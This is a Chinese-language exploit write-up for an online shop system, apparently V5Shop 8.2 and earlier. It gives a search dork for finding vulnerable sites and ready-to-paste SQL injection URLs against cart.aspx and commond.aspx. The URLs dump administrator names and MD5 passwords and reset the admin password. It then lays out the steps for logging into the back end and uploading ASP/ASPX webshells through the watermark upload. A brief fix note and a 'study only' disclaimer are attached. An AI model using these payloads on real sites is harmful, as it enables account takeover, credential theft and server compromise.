漏洞危害：高危
一、漏洞文件：cart.aspx

搜索关键词：inurl:scoreindex.aspx

exp ：

/cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 --

运行结果如图(红色圈部分就是用户和md5密码)：

然后针对爆出来的md5密码进行在线解密，如果顺利，就可以登陆后台，默认地址：/weblogin，输入上面的用户名和密码既可成功进入后台。（当然很多时候md5解密是没有结果的）此时需要先更新下管理员密码：

update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100

其中pass串先将密码转成32位，再转换成大写，再转换成sql16进制（上面串默认密码是v5shop）

完整语句为：

cart.aspx?act=buy&id=1 and (update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100
)>0 --

如果顺利，就可以登陆后台，默认地址：/weblogin，输入上面的用户名和密码既可成功进入后台。

进入后台后在系统设置-参数设置-后台上传水印,水印上传那儿貌似可以上传任意文件(可以先上传asp大马，然后再上传aspx大马)。

小结：此方法基本可以做到8.2版本及以下版本通杀，最新版8.3已解决该漏洞。

修复方法：升级最新8.3版，或者临时把cart.aspx改名或做其它方法处理。

二、漏洞文件：commond.aspx

exp:

/commond.aspx?id=1 and 1=(select top 1 [name] from web_admin)
上面这个可以直接显示出管理员用户名

/commond.aspx?id=1 and 1=(select top 1 [pass] from web_admin)
上面这个可以显示MD5密码

/commond.aspx?id=1 update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100

上面这个用于更改管理员密码

如果顺利，管理员密码已经被更改成你指定的密码（此处默认为v5shop），然后就可以登陆后台，默认地址：/weblogin，输入上面的用户名和密码既可成功进入后台。

拿shell方法：(未验证)
系统设置->参数设置->后台上传水印.
先传ASP的马..再传ASPX马.
上传后路径：/uploadFile/Picture/*.asp

小结：此方法基本可以做到8.2版本及以下版本通杀，最新版8.3已解决该漏洞。

修复方法：升级最新8.3版，或者临时把commond.aspx改名或做其它方法处理。

提示：使用系统者可以及时升级，阅读此文者请大家仅用于学习，勿用于非法用途。

cart.aspx?act=buy&id=1 update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100--